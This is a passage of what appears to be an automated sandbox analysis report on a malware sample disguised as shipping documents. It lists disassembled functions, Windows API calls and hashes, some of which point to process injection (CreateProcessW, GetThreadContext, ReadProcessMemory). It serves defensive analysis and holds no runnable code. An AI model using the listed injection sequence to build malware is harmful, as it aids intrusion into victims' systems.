                                                • Instruction Fuzzy Hash: CCF0F6F1800A009ED7606B7488027EE77971F40330F58410EA412AB1D1DF7C8982CB59
                                                Function 0154129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 01541A5B
                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01541AF1
                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01541B13
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257873961.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1540000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                • String ID:
                                                • API String ID: 2438371351-0
                                                • Opcode ID: aa5ac5a3be62539e190cb66ef3a7ce968b32dbbeab3f01f3ced4961a16edbae6
                                                • Instruction ID: 7e4bc0219fb81e80c3b05720f2bc293bcdf54783454043179d5ef5093577b9ef
                                                • Opcode Fuzzy Hash: aa5ac5a3be62539e190cb66ef3a7ce968b32dbbeab3f01f3ced4961a16edbae6
                                                • Instruction Fuzzy Hash: C312DD24E24658C6EB24DF64D8507DEB232FF68300F1090E9910DEB7A5E77A5F81CB5A
                                                Function 006A2123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fef862958d56dcda15e21af454d0ed7e3520f8b5a347c7f89dbde6cb71e3b0b5
                                                • Instruction ID: 3218de22aee613637822810d83db278769b46c97644397a04b84758632613464
                                                • Opcode Fuzzy Hash: fef862958d56dcda15e21af454d0ed7e3520f8b5a347c7f89dbde6cb71e3b0b5
                                                • Instruction Fuzzy Hash: 8A517235A00605AFCF55FB58C9A1EAE77ABAF45310F14806DF946AB392CB30ED01CB59
                                                Function 00695C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00695CF6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: dbefc36b0a0b0d6ecd1e03630cef9697ca959fa27e9a9268fdbdec70e045cabe
                                                • Instruction ID: e3e1a0eabc377d7b38b8c680246c0e7ec490cdaa68eea477676399ac7cd8739c
                                                • Opcode Fuzzy Hash: dbefc36b0a0b0d6ecd1e03630cef9697ca959fa27e9a9268fdbdec70e045cabe
                                                • Instruction Fuzzy Hash: 3A315E31A00B09EBCF19CF6DC484AADB7BAFF44320F148619D81A93B10D731B964DB94
                                                Function 006D00D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ClearVariant
                                                • String ID:
                                                • API String ID: 1473721057-0
                                                • Opcode ID: 601a79e406a0f47132ed2140ebf0a702d20f30dd8017dc9099babf5cdd1d8b76
                                                • Instruction ID: 03de59358ede6e26815afa4903c670a849d1c9ddd09dfcae9ac428943c1f983d
                                                • Opcode Fuzzy Hash: 601a79e406a0f47132ed2140ebf0a702d20f30dd8017dc9099babf5cdd1d8b76
                                                • Instruction Fuzzy Hash: 56415974908341DFDB24DF54C484B5ABBE2BF45308F1988ACE8894B762C732EC85CB96
                                                Function 00695B19 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: b6478b6a298dbb7958d02558fde4cfee31eae22e6c53a3d0d763c5a514352fbb
                                                • Instruction ID: ec90cb11b2c104f5c2bde5cd365151a7994836bfa1621cd467737a6f85ba30cc
                                                • Opcode Fuzzy Hash: b6478b6a298dbb7958d02558fde4cfee31eae22e6c53a3d0d763c5a514352fbb
                                                • Instruction Fuzzy Hash: 6221C371A00A08EBDF105F51E885B7A7FBAFF11350F21C46EE486C5514EB7194E0879A
                                                Function 0069C707 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _wcscmp
                                                • String ID:
                                                • API String ID: 856254489-0
                                                • Opcode ID: 2cc91d098237a6fbd75e30cbb712927e243c1defd93e19f258691d5d355ab95d
                                                • Instruction ID: de281bc1709a5f04864fc9f48f753fa6ea49461d599e5587bbae7ebf53a84879
                                                • Opcode Fuzzy Hash: 2cc91d098237a6fbd75e30cbb712927e243c1defd93e19f258691d5d355ab95d
                                                • Instruction Fuzzy Hash: 24119372E04119EBCF14EBA9DC819EEB77EEF51360F10411AE811AB690DB309E05CB94
                                                Function 00694F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00694D13: FreeLibrary.KERNEL32(00000000,?), ref: 00694D4D
                                                  • Part of subcall function 006B548B: __wfsopen.LIBCMT ref: 006B5496
                                                • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,007562F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00694F6F
                                                  • Part of subcall function 00694CC8: FreeLibrary.KERNEL32(00000000), ref: 00694D02
                                                  • Part of subcall function 00694DD0: _memmove.LIBCMT ref: 00694E1A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Library$Free$Load__wfsopen_memmove
                                                • String ID:
                                                • API String ID: 1396898556-0
                                                • Opcode ID: b2181da951c6474a0abaccab9866e6ba163791321767497961d36f24eff9dcdb
                                                • Instruction ID: 4f4d3b94fea9b01c0734d7c10996d98471d6ca8acc80cdd35c4ac06a1ec0d2c6
                                                • Opcode Fuzzy Hash: b2181da951c6474a0abaccab9866e6ba163791321767497961d36f24eff9dcdb
                                                • Instruction Fuzzy Hash: 6211E73160070AAACF54AF74CC02FAE77AE9F84711F10852DF542A66C1EE759A069BA4
                                                Function 006D01AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ClearVariant
                                                • String ID:
                                                • API String ID: 1473721057-0
                                                • Opcode ID: 9b814c98ff2e88b6ad8008151832501498fd36f9305a349448a801dfbf53537d
                                                • Instruction ID: 258bd9216835c32f623674adbbc988fafefd64d9e37d0721a1108253866eeaef
                                                • Opcode Fuzzy Hash: 9b814c98ff2e88b6ad8008151832501498fd36f9305a349448a801dfbf53537d
                                                • Instruction Fuzzy Hash: F92155B4908341DFCB24DF54C444B5ABBE6BF89304F04896CE88A4BB61C731F885DB96
                                                Function 00695D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00695807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00695D76
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 4107c2ad2a60745f31dd64a1c36e6372b9460145c1e9b2418fde4ec2ffde96e0
                                                • Instruction ID: 9d0ca982717623ac1996f1466c672e7eef514423f9f525f3e8579c3b665404e8
                                                • Opcode Fuzzy Hash: 4107c2ad2a60745f31dd64a1c36e6372b9460145c1e9b2418fde4ec2ffde96e0
                                                • Instruction Fuzzy Hash: 76113A31200B059FDB328F15D884BA2B7EAEF45760F10C92EE4AB86A50D770E949CB64
                                                Function 00695BDA Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: 9b54afcf07a23b9ff4e0bf05bec20c5cd47f57aecc711df460a32f44145caaaf
                                                • Instruction ID: e729a9c44e962411e24fb52c1bb738f80983c8e9837c0939c892d0a0a53cb10e
                                                • Opcode Fuzzy Hash: 9b54afcf07a23b9ff4e0bf05bec20c5cd47f57aecc711df460a32f44145caaaf
                                                • Instruction Fuzzy Hash: D10184B9600541AFC705EB69C451D66FBAAFF96350314815DF819C7B02DB31EC21CBE4
                                                Function 006B4A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                Download Yara Rule
                                                APIs
                                                • __lock_file.LIBCMT ref: 006B4AD6
                                                  • Part of subcall function 006B8D68: __getptd_noexit.LIBCMT ref: 006B8D68
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: __getptd_noexit__lock_file
                                                • String ID:
                                                • API String ID: 2597487223-0
                                                • Opcode ID: 67d6ef83ed616a88a6aed935c7a831e38fab6f96dc3a03383af96b1d5a86fa7c
                                                • Instruction ID: a41d2cdf1aeacf835e877493a6cadfd04b03919c923d8a5f2c36f60e61cde31e
                                                • Opcode Fuzzy Hash: 67d6ef83ed616a88a6aed935c7a831e38fab6f96dc3a03383af96b1d5a86fa7c
                                                • Instruction Fuzzy Hash: E5F081B19402099BDFA1AF74CC067DE3666AF00325F044518B4149B1D2DF788A91DB59
                                                Function 00694FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                Download Yara Rule
                                                APIs
                                                • FreeLibrary.KERNEL32(?,?,007562F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00694FDE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: 16202be0aa6a7d0237c099ad0febfff3b3bf426b98d0d14e56751e78a08c21c5
                                                • Instruction ID: 756699c473c3169581888f707511cb0d605e9a223b9d45d6e911ab71ce328e70
                                                • Opcode Fuzzy Hash: 16202be0aa6a7d0237c099ad0febfff3b3bf426b98d0d14e56751e78a08c21c5
                                                • Instruction Fuzzy Hash: 3AF03071105712CFCF349F64D494C92BBEABF4432A3208A3EE5D782A10CB319842DF40
                                                Function 006B09D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006B09F4
                                                  • Part of subcall function 00697D2C: _memmove.LIBCMT ref: 00697D66
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: LongNamePath_memmove
                                                • String ID:
                                                • API String ID: 2514874351-0
                                                • Opcode ID: f6a8547c981c8070f286f748cbd7f7cda44bc92ab27d0e45f7361366263e88ef
                                                • Instruction ID: a03a9de10cfe440a789eb61853f77c19f84c6c09f6902312c646366d621bb61d
                                                • Opcode Fuzzy Hash: f6a8547c981c8070f286f748cbd7f7cda44bc92ab27d0e45f7361366263e88ef
                                                • Instruction Fuzzy Hash: 26E0CD3690422857C720D65C9C05FFA77EDDF89790F0441B9FC0CD7245D9759C818694
                                                Function 006F9129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: __fread_nolock
                                                • String ID:
                                                • API String ID: 2638373210-0
                                                • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                • Instruction ID: d8a8cb95b7bcde5dbd1e627966e87e829ca004b964b70b9c4e987f49533205b6
                                                • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                • Instruction Fuzzy Hash: EAE092B0104B045FD7748A24D811BE373E1AB06315F00091CF2AB83341EB627841C759
                                                Function 00695DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,006CE16B,?,?,00000000), ref: 00695DBF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: eb30baa9c037c1f1ec627393d72aa470facbc202664b675d1acafbb3f3c95953
                                                • Instruction ID: b110a5a6e698679337587569a3550caac092d80bbc2ed513866e31a101931744
                                                • Opcode Fuzzy Hash: eb30baa9c037c1f1ec627393d72aa470facbc202664b675d1acafbb3f3c95953
                                                • Instruction Fuzzy Hash: B7D0C77464020CBFE710DB84DC46FA9777CD705710F104195FD0456290D6B27D509795
                                                Function 006B548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: __wfsopen
                                                • String ID:
                                                • API String ID: 197181222-0
                                                • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                • Instruction ID: f7795be6b48d50d3c4c5000de8e954dfa829c5b448764dac2e862d079d37d1c3
                                                • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                • Instruction Fuzzy Hash: A8B092B684020C77DE422E82EC02B993B5A9B40778F808020FB0C18162A673A6A09689
                                                Function 006FD2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32(00000002,00000000), ref: 006FD46A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ErrorLast
                                                • String ID:
                                                • API String ID: 1452528299-0
                                                • Opcode ID: d4b67aba3b63a4cecc12404070d52d44eafcb6fdc2ab9891778df4c1a3b37384
                                                • Instruction ID: d6f4a8c20e2eb088699f807fc95cfc2ee1c1398f1c0deb2aab5bcf77e1bc3b8b
                                                • Opcode Fuzzy Hash: d4b67aba3b63a4cecc12404070d52d44eafcb6fdc2ab9891778df4c1a3b37384
                                                • Instruction Fuzzy Hash: 1D7161302083058FCB54EF28C491AAEB7E7AF89314F04456DF9968B7A1DB30ED49CB56
                                                Function 006B0E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                • Instruction ID: 39f46ed3662f9aa03dfb28eebf9b531f0b02e583680418cba6b529820d22c2d0
                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                • Instruction Fuzzy Hash: B33195B1A00105DFE718DF58D4809AAFBA6FF59310B648AA5E409CF755DB31EDC2CB90
                                                Function 0154229C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNELBASE(000001F4), ref: 015422B1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257873961.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1540000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID:
                                                • API String ID: 3472027048-0
                                                • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                • Instruction ID: da57bb2a9c56e0d860c4c75fb0e19ada875fc697ceb395a110b9d4f907e38357
                                                • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                • Instruction Fuzzy Hash: C8E0BF7494410EEFDB00EFA4D5496DE7BB4FF04311F1005A1FD05D7681DB309E548A62
                                                Function 015422A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNELBASE(000001F4), ref: 015422B1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257873961.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1540000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID:
                                                • API String ID: 3472027048-0
                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
